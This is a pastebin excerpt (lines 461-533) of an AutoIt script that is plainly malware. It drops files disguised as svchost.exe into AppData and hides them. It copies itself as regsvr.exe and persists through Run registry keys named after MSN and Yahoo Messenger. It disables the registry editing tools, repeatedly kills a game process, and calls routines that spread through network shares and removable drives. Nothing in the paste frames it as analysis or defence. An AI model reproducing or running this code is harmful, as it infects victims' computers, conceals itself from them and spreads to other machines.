  461. Func installrestrict()
  462. Opt("RunErrorsFatal", 0)
  463. DirCreate(@AppDataDir & "\support")
  464. FileInstall("C:\svchost.exe", @AppDataDir & "\support\" & "svchost" & ".exe", 0)
  465. FileInstall("C:\svchost.001", @AppDataDir & "\support\" & "svchost" & ".001", 0)
  466. FileSetAttrib(@AppDataDir & "\support\" & "svchost" & ".exe", "+RSH")
  467. FileSetAttrib(@AppDataDir & "\support\" & "svchost" & ".001", "+RSH")
  468. FileCopy(@AutoItExe, @AppDataDir & "\" & "regsvr" & ".exe", 0)
  469. $12345 = @AppDataDir & "\" & "regsvr" & ".exe"
  470. If NOT (RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger") == $12345) Then
  471. Run(@AppDataDir & "\support\" & "svchost" & ".exe", "")
  472. EndIf
  473. EndFunc
  474.  
  475. Func regeditrestrict()
  476. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Msn Messsenger", "REG_SZ", @AppDataDir & "\regsvr" & ".exe")
  477. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messsenger", "REG_SZ", @AppDataDir & "\support\" & "svchost" & ".exe")
  478. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 0)
  479. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 0)
  480. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
  481. EndFunc
  482.  
  483. Func restrictmain()
  484. $hour = @HOUR + 2
  485. $min = @MIN + 30
  486. Opt("RunErrorsFatal", 0)
  487. installrestrict()
  488. regeditrestrict()
  489. writeini()
  490. a390060006024()
  491. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") = "" Then
  492. networkrestrict()
  493. EndIf
  494. If RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared") <> "" Then
  495. If FileExists(RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")) = 0 Then
  496. networkrestrict()
  497. EndIf
  498. EndIf
  499. If ProcessExists("game_y.exe") Then
  500. ProcessClose("game_y.exe")
  501. EndIf
  502. Sleep(1000)
  503. If ProcessExists("game_y.exe") Then
  504. ProcessClose("game_y.exe")
  505. EndIf
  506. Sleep(1000)
  507. If ProcessExists("game_y.exe") Then
  508. ProcessClose("game_y.exe")
  509. EndIf
  510. Sleep(1000)
  511. If ProcessExists("game_y.exe") Then
  512. ProcessClose("game_y.exe")
  513. EndIf
  514. Sleep(1000)
  515. While (1)
  516. removablerestrict()
  517. If @MIN = $min Then
  518. EndIf
  519. WEnd
  520. EndFunc
  521.  
  522. Opt("RunErrorsFatal", 0)
  523. If IsAdmin() Then
  524. If FileExists(@WindowsDir & "\" & "winhelp.ini") Then
  525. delete()
  526. EndIf
  527. EndIf
  528. If IsAdmin() Then
  529. funmain()
  530. EndIf
  531. If NOT IsAdmin() Then
  532. restrictmain()
  533. EndIf
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!